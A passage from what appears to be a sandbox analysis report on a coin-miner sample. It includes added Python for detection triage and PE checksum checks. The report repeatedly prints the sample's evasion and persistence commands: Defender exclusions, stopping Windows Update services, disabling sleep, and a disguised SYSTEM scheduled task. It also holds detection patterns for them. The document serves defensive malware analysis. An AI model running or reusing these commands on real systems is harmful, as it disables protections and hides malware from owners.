      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Windows\System32\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
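      The process tree above is the whole defence-evasion and persistence chain in five command lines: powershell.exe adding the user profile and Program Files to the Defender exclusion list, cmd.exe stopping the Windows Update services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), powercfg.exe zeroing the standby and hibernate timeouts so the miner keeps running, a SYSTEM-level scheduled task named GoogleUpdateTaskMachineQC pointing at the dropped updater.exe, and powershell.exe launched from dialer.exe, a phone-dialer applet that does not normally spawn anything. The script below is an added example, not part of the Joe Sandbox report: it parses process-creation records in the report's own "Source: ... Process created: ..." form (six lines copied from above plus one constructed benign record as sample input) and tags each with the behaviour it matches. Treating dialer.exe as a parent that should never launch a shell is this example's own assumption, drawn from this report, not a rule the sandbox applies.

```python
import re
from collections import Counter

# Process-creation records in the sandbox report's own column format.
# The first six are copied from the report above; the last is a constructed
# benign control that must produce no tags.  The sandbox text runs the
# "Source" and "Process created" columns together; the parser accepts that
# fused form as well as a "|"-separated one.
SAMPLE_RECORDS = [
    r"""Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force""",
    r"""Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc""",
    r"""Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0""",
    r"""Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc""",
    r"""Source: C:\Users\user\Desktop\test2.exeProcess created: unknown unknown""",
    # Constructed benign control (not from the report).
    r"""Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\notepad.exe notepad.exe""",
]

RECORD_RE = re.compile(
    r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*"
    r"(?P<image>unknown|.+?\.exe)\s*(?P<cmd>.*)$",
    re.IGNORECASE,
)

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption for this example, taken from this report rather than from any
# sandbox rule: dialer.exe never legitimately launches a shell.
SUSPICIOUS_SHELL_PARENTS = {"dialer.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_record(line):
    """Split one record into parent image, child image, full command line and
    the arguments that follow the (possibly quoted) child image path."""
    m = RECORD_RE.match(line.strip())
    if m is None:
        return None
    image, cmd = m.group("image"), m.group("cmd")
    args = re.sub(r'^"?' + re.escape(image) + r'"?\s*', "", cmd, flags=re.IGNORECASE)
    return {"parent": m.group("parent"), "image": image, "cmd": cmd, "args": args}


def stopped_services(cmd):
    """Service names passed to 'sc stop' anywhere in the command line, lower-cased."""
    return {s.lower() for s in re.findall(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", cmd, re.IGNORECASE)}


def classify(rec):
    """Behaviour tags for one parsed record; an empty list means nothing matched."""
    cmd, args = rec["cmd"], rec["args"]
    tags = []
    # Defender exclusions or disabled features via the MpPreference cmdlets.
    if re.search(r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion\w+|Disable\w+)", cmd, re.IGNORECASE):
        tags.append("defender_exclusion")
    # Any of the Windows Update / BITS / delivery-optimisation services stopped.
    if stopped_services(cmd) & UPDATE_SERVICES:
        tags.append("stops_update_services")
    # Standby or hibernate timeout set to 0 (never) on AC or DC power.
    if re.search(r"\bpowercfg\b.*?-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", cmd, re.IGNORECASE):
        tags.append("disables_sleep")
    # Scheduled task running as SYSTEM at the highest run level, either API.
    if (re.search(r"Register-ScheduledTask|\bschtasks\b.*?/create", cmd, re.IGNORECASE)
            and re.search(r"-RunLevel\s+'?Highest|/rl\s+highest", cmd, re.IGNORECASE)
            and re.search(r"-User\s+'?System\b|/ru\s+'?System\b", cmd, re.IGNORECASE)):
        tags.append("system_scheduled_task")
    # Command line opens with a PowerShell block comment (<#...#>) used as a
    # per-build random prefix, the pattern flagged under Data Obfuscation.
    if args.startswith("<#"):
        tags.append("commented_command_prefix")
    if basename(rec["parent"]) in SUSPICIOUS_SHELL_PARENTS and basename(rec["image"]) in SHELLS:
        tags.append("unusual_parent")
    return tags


def triage(lines):
    """Tag counts over all parseable records plus the update services stopped."""
    counts = Counter()
    services = set()
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        counts.update(classify(rec))
        services |= stopped_services(rec["cmd"]) & UPDATE_SERVICES
    return dict(counts), sorted(services)


if __name__ == "__main__":
    counts, services = triage(SAMPLE_RECORDS)
    for tag, n in sorted(counts.items()):
        print(f"{tag:26} {n}")
    print("update services stopped:", ", ".join(services))
```

      Run stand-alone it prints one count per tag and the five update services stopped. Against a real EDR export, feed it parent image, child image and command line in the same "Source: parent Process created: child cmdline" shape, or swap parse_record for the export's own fields; the classify rules are independent of the sandbox format.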
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\dialer.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\System32\dialer.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Google\Chrome\updater.exe | Directory created: C:\Program Files\Google\Libs
      Source: test2.exe | Static PE information: Image base 0x140000000 > 0x60000000
      Source: test2.exe | Static file information: File size 5986304 > 1048576
      Source: test2.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00
      Source: test2.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

      Data Obfuscation

      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: kkldhmzqxige.tmp.30.dr | Static PE information: real checksum: 0x0 should be: 0x554c2a
      Source: updater.exe.0.dr | Static PE information: real checksum: 0x5b5d5c should be: 0x5bb0b6
      Source: test2.exe | Static PE information: real checksum: 0x5b5d5c should be: 0x5bb0b6
      Source: kkldhmzqxige.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x342e8
      Source: test2.exe | Static PE information: section name: .xdata
      Source: updater.exe.0.dr | Static PE information: section name: .xdata
      Source: kkldhmzqxige.tmp.30.dr | Static PE information: section name: _RANDOMX
      Source: kkldhmzqxige.tmp.30.dr | Static PE information: section name: _TEXT_CN
      Source: kkldhmzqxige.tmp.30.dr | Static PE information: section name: _TEXT_CN
      Source: kkldhmzqxige.tmp.30.dr | Static PE information: section name: _RDATA
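      The "real checksum ... should be ..." lines compare the CheckSum field in the PE optional header with the value Windows computes for the file (the algorithm behind CheckSumMappedFile in imagehlp: a ones'-complement sum of every 32-bit word except the field itself, folded to 16 bits, plus the file length). A stored value of 0, as in both kkldhmzqxige.tmp drops, means the linker never set it; a non-zero mismatch, as in test2.exe and updater.exe, means the bytes were modified after the checksum was written. The test2.exe numbers fit that shape: the file is 5986304 (0x5B5800) bytes, the expected 0x5BB0B6 is that length plus a 16-bit fold, and the stored 0x5B5D5C is a checksum of the same form computed over different contents of the same length, which is what post-link patching or packing looks like. updater.exe showing the identical pair is consistent with it being a straight copy of the sample. The code below is an added example, not part of the report: it implements the check and runs it on a constructed, header-only PE32+ image (not the sample), showing the unset, corrected and tampered states.

```python
import struct

OPTIONAL_HEADER_CHECKSUM = 0x40  # CheckSum offset inside the optional header, PE32 and PE32+ alike


def checksum_field_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    offset = e_lfanew + 4 + 20 + OPTIONAL_HEADER_CHECKSUM  # signature + COFF header
    if offset % 4:
        raise ValueError("CheckSum field is not dword aligned")
    return offset


def pe_checksum(data):
    """The value CheckSumMappedFile would produce for this file image."""
    skip = checksum_field_offset(data)
    padded = data + b"\0" * (-len(data) % 4)  # sum whole dwords; length added unpadded below
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue  # the CheckSum field itself is excluded from the sum
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def stored_checksum(data):
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify(data):
    """True when the header's CheckSum matches the file; a stored 0 never verifies."""
    return stored_checksum(data) == pe_checksum(data)


def set_checksum(data):
    """Return a copy with the correct CheckSum written into the header."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), pe_checksum(data))
    return bytes(buf)


def build_minimal_pe32plus():
    """Constructed header-only PE32+ image (not loadable) with CheckSum left at 0,
    the state the report flags for kkldhmzqxige.tmp."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymbols, NumSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0x66A1B2C3, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)                 # ImageBase, same as test2.exe
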